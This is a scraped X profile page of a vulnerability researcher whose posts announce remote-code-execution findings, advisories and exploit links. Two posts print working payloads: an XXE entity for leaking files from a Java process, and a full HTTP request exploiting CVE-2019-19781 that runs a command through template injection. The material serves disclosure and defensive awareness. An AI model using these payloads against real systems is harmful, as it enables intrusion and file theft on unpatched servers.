1. X
  2. ϻг_ϻε
Log inSign up
ϻг_ϻε
6,191 posts
user avatar
ϻг_ϻε
@steventseeley
Artist disguised as a logician. Pwn2Own Winner. Spiritual Alchemy. An adept in the making.
srcincite.io
Joined April 2011
560
Following
22.7K
Followers
RepliesRepliesMediaMedia
Terms·Privacy·Cookies·Accessibility·Ads Info·© 2026 X Corp.
Don't miss what's happening
People on X are the first to know.
Log inSign up

New to X?

Sign up now to get your own personalized timeline!

Create account

By signing up, you agree to the Terms of Service and Privacy Policy, including Cookie Use.

  • Pinned
    user avatar
    ϻг_ϻε
    @steventseeley
    Jan 29
    Samstung Part 2 :: Remote Code Execution in MagicINFO 9 Server srcincite.io/blog/2026/01/2…
    28K
  • user avatar
    ϻг_ϻε
    @steventseeley
    Sep 27, 2019
    Interviewing with @TalosSecurity Them: So if you get the job you can't audit any of our products Me: Ok ... *8 interviews later* ... Them: Sorry, but you didn't get the job Me:
  • user avatar
    ϻг_ϻε
    @steventseeley
    Jan 1, 2024
    CVE-2023-51572. Beautiful bug, so simple.
    297K
  • user avatar
    ϻг_ϻε
    @steventseeley
    Jan 12, 2021
    A story on how I gained RCE against Microsoft Exchange Online using CVE-2020-16875 and bypassed their patches twice over. Latest patch bypass is unpatched against on-premise deployments! Making Clouds Rain - Remote Code Execution in Microsoft Office 365: srcincite.io/blog/2021/01/1…
  • user avatar
    ϻг_ϻε
    @steventseeley
    Mar 5, 2020
    Since @Zoho typically ignores researchers, I figured it was OK to share a ManageEngine Desktop Central zero-day exploit with everyone. UnCVE'ed, unpatched and unauthenticated RCE as SYSTEM/root. Enjoy! Advisory: srcincite.io/advisories/src… Exploit: srcincite.io/pocs/src-2020-…
  • user avatar
    ϻг_ϻε
    @steventseeley
    Jul 20, 2020
    SharePoint and Pwn :: Remote Code Execution Against SharePoint Server Abusing DataSet: srcincite.io/blog/2020/07/2… CVE-2020-1147 full analysis and exploit :->
  • user avatar
    ϻг_ϻε
    @steventseeley
    Jan 14, 2020
    I'm excited to share my post about discovering & exploiting multiple critical vulnerabilities in Cisco's DCNM. Busting Cisco's Beans :: Hardcoding Your Way to Hell srcincite.io/blog/2020/01/1… PoC exploit code: srcincite.io/pocs/cve-2019-… srcincite.io/pocs/cve-2019-… srcincite.io/pocs/cve-2019-…
  • user avatar
    ϻг_ϻε
    @steventseeley
    Jan 21, 2022
    CVE-2021-44515 - Reset the admin password unauthenticated and login! PoC:
    user avatar
    Source Incite
    @sourceincite
    Jan 21, 2022
    Zoho ManageEngine Desktop Central StateFilter Arbitrary Forward Authentication Bypass Vulnerability srcincite.io/advisories/src…
  • user avatar
    ϻг_ϻε
    @steventseeley
    Dec 10, 2021
    For those that are trying to keep up, the log4j JNDI injection is probably pre-auth RCE on approx ~90% of your Java apps. You wanna patch this one.
  • user avatar
    ϻг_ϻε
    @steventseeley
    Aug 26, 2020
    We welcome a new hacker into the world! :->
  • user avatar
    ϻг_ϻε
    @steventseeley
    Oct 18, 2021
    If your exploiting your XXE under Java, I recommend a payload like this: <!DOCTYPE root [ <!ENTITY stuff SYSTEM "."> ]><root>&stuff;</root> So that you can start the file leak from the CWD of the Java process. This is important when chaining for an RCE.
  • user avatar
    ϻг_ϻε
    @steventseeley
    Feb 24, 2021
    Who needs SSH for CVE-2021-21972? :->
  • user avatar
    ϻг_ϻε
    @steventseeley
    Oct 13, 2020
    Microsoft SharePoint Server DataFormWebPart CreateChildControls Server-Side Include Remote Code Execution Vulnerability CVE: CVE-2020-16952 Advisory: srcincite.io/advisories/src… Technical analysis + PoC exploit: srcincite.io/pocs/cve-2020-…
  • user avatar
    ϻг_ϻε
    @steventseeley
    Jan 13, 2020
    For team blue: Turns out CVE-2019-19781 doesn't need a traversal, beware. POST /vpns/portal/scripts/newbm.pl HTTP/1.1 Host: <target> NSC_USER: ../../../netscaler/portal/templates/si NSC_NONCE: 5 Content-Length: 53 url=a&title=[%+template.new({'BLOCK'='print+`id`'})%]